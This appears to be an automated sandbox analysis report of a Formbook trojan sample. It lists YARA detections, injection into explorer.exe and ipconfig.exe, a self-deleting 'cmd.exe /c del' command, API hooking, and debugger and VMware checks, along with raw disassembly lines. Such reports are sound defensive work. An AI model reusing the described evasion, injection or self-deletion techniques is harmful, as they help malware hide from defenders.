              Source: 00000004.00000002.4447035918.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000004.00000002.4447035918.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000004.00000002.4448376202.0000000003E7F000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000004.00000002.4448376202.0000000003E7F000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000004.00000002.4448376202.0000000003E7F000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000004.00000002.4447615775.0000000003570000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000004.00000002.4447615775.0000000003570000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000004.00000002.4447615775.0000000003570000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000002.2046471465.00000000016F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000000.00000002.2046471465.00000000016F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000000.00000002.2046471465.00000000016F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: Process Memory Space: i5NDVAFg42.exe PID: 3060, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: Process Memory Space: explorer.exe PID: 1028, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: Process Memory Space: ipconfig.exe PID: 1772, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: i5NDVAFg42.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: i5NDVAFg42.exeStatic PE information: Section .text
              Source: classification engineClassification label: mal100.troj.evad.winEXE@8/0@11/8
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6648:120:WilError_03
              Source: C:\Windows\explorer.exe File read: C:\Users\desktop.ini
              Source: C:\Users\user\Desktop\i5NDVAFg42.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: i5NDVAFg42.exeReversingLabs: Detection: 89%
              Source: unknownProcess created: C:\Users\user\Desktop\i5NDVAFg42.exe C:\Users\user\Desktop\i5NDVAFg42.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autochk.exe C:\Windows\SysWOW64\autochk.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
              Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\i5NDVAFg42.exe"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
              Source: i5NDVAFg42.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: ipconfig.pdb source: i5NDVAFg42.exe, 00000000.00000003.2044767474.0000000001245000.00000004.00000020.00020000.00000000.sdmp, i5NDVAFg42.exe, 00000000.00000002.2046841117.0000000001AD0000.00000040.10000000.00040000.00000000.sdmp, i5NDVAFg42.exe, 00000000.00000003.2044525388.000000000123F000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4446909589.0000000000A90000.00000040.80000000.00040000.00000000.sdmp
              Source: Binary string: ipconfig.pdbGCTL source: i5NDVAFg42.exe, 00000000.00000003.2044767474.0000000001245000.00000004.00000020.00020000.00000000.sdmp, i5NDVAFg42.exe, 00000000.00000002.2046841117.0000000001AD0000.00000040.10000000.00040000.00000000.sdmp, i5NDVAFg42.exe, 00000000.00000003.2044525388.000000000123F000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4446909589.0000000000A90000.00000040.80000000.00040000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: i5NDVAFg42.exe, 00000000.00000003.1987282372.00000000013F3000.00000004.00000020.00020000.00000000.sdmp, i5NDVAFg42.exe, 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, i5NDVAFg42.exe, 00000000.00000003.1989066813.00000000015A7000.00000004.00000020.00020000.00000000.sdmp, i5NDVAFg42.exe, 00000000.00000002.2046523999.00000000018EE000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4447883047.0000000003ACE000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4447883047.0000000003930000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.2045464190.00000000035D9000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.2047562962.0000000003780000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: i5NDVAFg42.exe, i5NDVAFg42.exe, 00000000.00000003.1987282372.00000000013F3000.00000004.00000020.00020000.00000000.sdmp, i5NDVAFg42.exe, 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, i5NDVAFg42.exe, 00000000.00000003.1989066813.00000000015A7000.00000004.00000020.00020000.00000000.sdmp, i5NDVAFg42.exe, 00000000.00000002.2046523999.00000000018EE000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, ipconfig.exe, 00000004.00000002.4447883047.0000000003ACE000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4447883047.0000000003930000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.2045464190.00000000035D9000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.2047562962.0000000003780000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_00CF7090 pushad ; iretd 0_2_00CF7096
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_00CFE266 push E89010BFh; ret 0_2_00CFE582
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_00CFEA1C push dword ptr [D4EF9124h]; ret 0_2_00CFEA3E
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_00CFD4B5 push eax; ret 0_2_00CFD508
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_00CE2D89 push ebp; iretd 0_2_00CE2D8A
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_00CFD56C push eax; ret 0_2_00CFD572
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_00CFD50B push eax; ret 0_2_00CFD572
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_00CFD502 push eax; ret 0_2_00CFD508
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0175225F pushad ; ret 0_2_017527F9
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017527FA pushad ; ret 0_2_017527F9
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017809AD push ecx; mov dword ptr [esp], ecx0_2_017809B6
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0175283D push eax; iretd 0_2_01752858
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01759939 push es; iretd 0_2_01759940
              Source: C:\Windows\explorer.exeCode function: 2_2_0E4D6B02 push esp; retn 0000h2_2_0E4D6B03
              Source: C:\Windows\explorer.exeCode function: 2_2_0E4D6B1E push esp; retn 0000h2_2_0E4D6B1F
              Source: C:\Windows\explorer.exeCode function: 2_2_0E4D69B5 push esp; retn 0000h2_2_0E4D6AE7
              Source: C:\Windows\explorer.exeCode function: 2_2_105EF9B5 push esp; retn 0000h2_2_105EFAE7
              Source: C:\Windows\explorer.exeCode function: 2_2_105EFB1E push esp; retn 0000h2_2_105EFB1F
              Source: C:\Windows\explorer.exeCode function: 2_2_105EFB02 push esp; retn 0000h2_2_105EFB03
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039609AD push ecx; mov dword ptr [esp], ecx4_2_039609B6
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0310E266 push E89010BFh; ret 4_2_0310E582
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0310EA1C push dword ptr [D4EF9124h]; ret 4_2_0310EA3E
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_030F2D89 push ebp; iretd 4_2_030F2D8A
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03107090 pushad ; iretd 4_2_03107096
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0310D502 push eax; ret 4_2_0310D508
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0310D50B push eax; ret 4_2_0310D572
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0310D56C push eax; ret 4_2_0310D572
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0310D4B5 push eax; ret 4_2_0310D508
              Source: i5NDVAFg42.exeStatic PE information: section name: .text entropy: 7.410197142919947

              Persistence and Installation Behavior

              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe

              Hooking and other Techniques for Hiding and Protection

              Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x82 0x2E 0xEC
              Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\ipconfig.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\i5NDVAFg42.exeRDTSC instruction interceptor: First address: 0000000000CE9904 second address: 0000000000CE990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeRDTSC instruction interceptor: First address: 0000000000CE9B7E second address: 0000000000CE9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 00000000030F9904 second address: 00000000030F990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 00000000030F9B7E second address: 00000000030F9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_00CE9AB0 rdtsc 0_2_00CE9AB0
              Source: C:\Windows\explorer.exe Window / User API: threadDelayed 1970
              Source: C:\Windows\explorer.exe Window / User API: threadDelayed 7969
              Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 883
              Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 867
              Source: C:\Windows\SysWOW64\ipconfig.exe Window / User API: threadDelayed 9833
              Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeAPI coverage: 1.7 %
              Source: C:\Windows\SysWOW64\ipconfig.exeAPI coverage: 1.7 %
              Source: C:\Windows\explorer.exe TID: 2260 Thread sleep count: 1970 > 30
              Source: C:\Windows\explorer.exe TID: 2260 Thread sleep time: -3940000s >= -30000s
              Source: C:\Windows\explorer.exe TID: 2260 Thread sleep count: 7969 > 30
              Source: C:\Windows\explorer.exe TID: 2260 Thread sleep time: -15938000s >= -30000s
              Source: C:\Windows\SysWOW64\ipconfig.exe TID: 6172 Thread sleep count: 136 > 30
              Source: C:\Windows\SysWOW64\ipconfig.exe TID: 6172 Thread sleep time: -272000s >= -30000s
              Source: C:\Windows\SysWOW64\ipconfig.exe TID: 6172 Thread sleep count: 9833 > 30
              Source: C:\Windows\SysWOW64\ipconfig.exe TID: 6172 Thread sleep time: -19666000s >= -30000s
              Source: C:\Windows\SysWOW64\ipconfig.exeLast function: Thread delayed
              Source: explorer.exe, 00000002.00000000.2005546585.000000000C669000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_p
              Source: explorer.exe, 00000002.00000002.4449747928.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
              Source: explorer.exe, 00000002.00000002.4451988670.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1998453035.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0r
              Source: explorer.exe, 00000002.00000003.3780787324.0000000009C21000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
              Source: explorer.exe, 00000002.00000000.1998453035.0000000009B8A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTcaVMWare
              Source: explorer.exe, 00000002.00000002.4451988670.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
              Source: explorer.exe, 00000002.00000000.1993050784.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
              Source: explorer.exe, 00000002.00000000.1998453035.0000000009B8A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
              Source: explorer.exe, 00000002.00000000.1993050784.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware-42 27 d9 2e dc 89 72 dX
              Source: explorer.exe, 00000002.00000000.1992382164.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
              Source: explorer.exe, 00000002.00000002.4449747928.0000000007637000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_SATAZ
              Source: explorer.exe, 00000002.00000002.4449747928.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
              Source: explorer.exe, 00000002.00000002.4451988670.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1998453035.0000000009B2C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: explorer.exe, 00000002.00000000.1993050784.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
              Source: explorer.exe, 00000002.00000000.1993050784.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware,p
              Source: explorer.exe, 00000002.00000003.3780787324.0000000009C21000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
              Source: explorer.exe, 00000002.00000000.1992382164.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
              Source: explorer.exe, 00000002.00000002.4451988670.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
              Source: explorer.exe, 00000002.00000000.1994801802.000000000769A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: C:\Users\user\Desktop\i5NDVAFg42.exe Process information queried: ProcessInformation
              Source: C:\Users\user\Desktop\i5NDVAFg42.exe Process queried: DebugPort
              Source: C:\Windows\SysWOW64\ipconfig.exe Process queried: DebugPort
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_00CEACF0 LdrLoadDll,0_2_00CEACF0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0178A3C0 mov eax, dword ptr fs:[00000030h]0_2_0178A3C0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0178A3C0 mov eax, dword ptr fs:[00000030h]0_2_0178A3C0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0178A3C0 mov eax, dword ptr fs:[00000030h]0_2_0178A3C0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017883C0 mov eax, dword ptr fs:[00000030h]0_2_017883C0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017883C0 mov eax, dword ptr fs:[00000030h]0_2_017883C0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017883C0 mov eax, dword ptr fs:[00000030h]0_2_017883C0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017883C0 mov eax, dword ptr fs:[00000030h]0_2_017883C0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01802349 mov eax, dword ptr fs:[00000030h]0_2_01802349
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01802349 mov eax, dword ptr fs:[00000030h]0_2_01802349
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01802349 mov eax, dword ptr fs:[00000030h]0_2_01802349
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01802349 mov eax, dword ptr fs:[00000030h]0_2_01802349
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01802349 mov eax, dword ptr fs:[00000030h]0_2_01802349
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01802349 mov eax, dword ptr fs:[00000030h]0_2_01802349
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01802349 mov eax, dword ptr fs:[00000030h]0_2_01802349
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01802349 mov eax, dword ptr fs:[00000030h]0_2_01802349
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01802349 mov eax, dword ptr fs:[00000030h]0_2_01802349
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01802349 mov eax, dword ptr fs:[00000030h]0_2_01802349
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01802349 mov eax, dword ptr fs:[00000030h]0_2_01802349
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01802349 mov eax, dword ptr fs:[00000030h]0_2_01802349
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01802349 mov eax, dword ptr fs:[00000030h]0_2_01802349
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01802349 mov eax, dword ptr fs:[00000030h]0_2_01802349
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01802349 mov eax, dword ptr fs:[00000030h]0_2_01802349
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01828350 mov ecx, dword ptr fs:[00000030h]0_2_01828350
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0184A352 mov eax, dword ptr fs:[00000030h]0_2_0184A352
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0180035C mov eax, dword ptr fs:[00000030h]0_2_0180035C
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0180035C mov eax, dword ptr fs:[00000030h]0_2_0180035C
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0180035C mov eax, dword ptr fs:[00000030h]0_2_0180035C
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0180035C mov ecx, dword ptr fs:[00000030h]0_2_0180035C
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0180035C mov eax, dword ptr fs:[00000030h]0_2_0180035C
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0180035C mov eax, dword ptr fs:[00000030h]0_2_0180035C
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01778397 mov eax, dword ptr fs:[00000030h]0_2_01778397
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01778397 mov eax, dword ptr fs:[00000030h]0_2_01778397
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01778397 mov eax, dword ptr fs:[00000030h]0_2_01778397
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017A438F mov eax, dword ptr fs:[00000030h]0_2_017A438F
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017A438F mov eax, dword ptr fs:[00000030h]0_2_017A438F
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0182437C mov eax, dword ptr fs:[00000030h]0_2_0182437C
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0177E388 mov eax, dword ptr fs:[00000030h]0_2_0177E388
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0177E388 mov eax, dword ptr fs:[00000030h]0_2_0177E388
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0177E388 mov eax, dword ptr fs:[00000030h]0_2_0177E388
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01800283 mov eax, dword ptr fs:[00000030h]0_2_01800283
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01800283 mov eax, dword ptr fs:[00000030h]0_2_01800283
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01800283 mov eax, dword ptr fs:[00000030h]0_2_01800283
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01784260 mov eax, dword ptr fs:[00000030h]0_2_01784260
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01784260 mov eax, dword ptr fs:[00000030h]0_2_01784260
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01784260 mov eax, dword ptr fs:[00000030h]0_2_01784260
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0177826B mov eax, dword ptr fs:[00000030h]0_2_0177826B
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_018162A0 mov eax, dword ptr fs:[00000030h]0_2_018162A0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_018162A0 mov ecx, dword ptr fs:[00000030h]0_2_018162A0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_018162A0 mov eax, dword ptr fs:[00000030h]0_2_018162A0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_018162A0 mov eax, dword ptr fs:[00000030h]0_2_018162A0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_018162A0 mov eax, dword ptr fs:[00000030h]0_2_018162A0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_018162A0 mov eax, dword ptr fs:[00000030h]0_2_018162A0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01786259 mov eax, dword ptr fs:[00000030h]0_2_01786259
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0177A250 mov eax, dword ptr fs:[00000030h]0_2_0177A250
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0177823B mov eax, dword ptr fs:[00000030h]0_2_0177823B
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017902E1 mov eax, dword ptr fs:[00000030h]0_2_017902E1
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017902E1 mov eax, dword ptr fs:[00000030h]0_2_017902E1
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017902E1 mov eax, dword ptr fs:[00000030h]0_2_017902E1
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0178A2C3 mov eax, dword ptr fs:[00000030h]0_2_0178A2C3
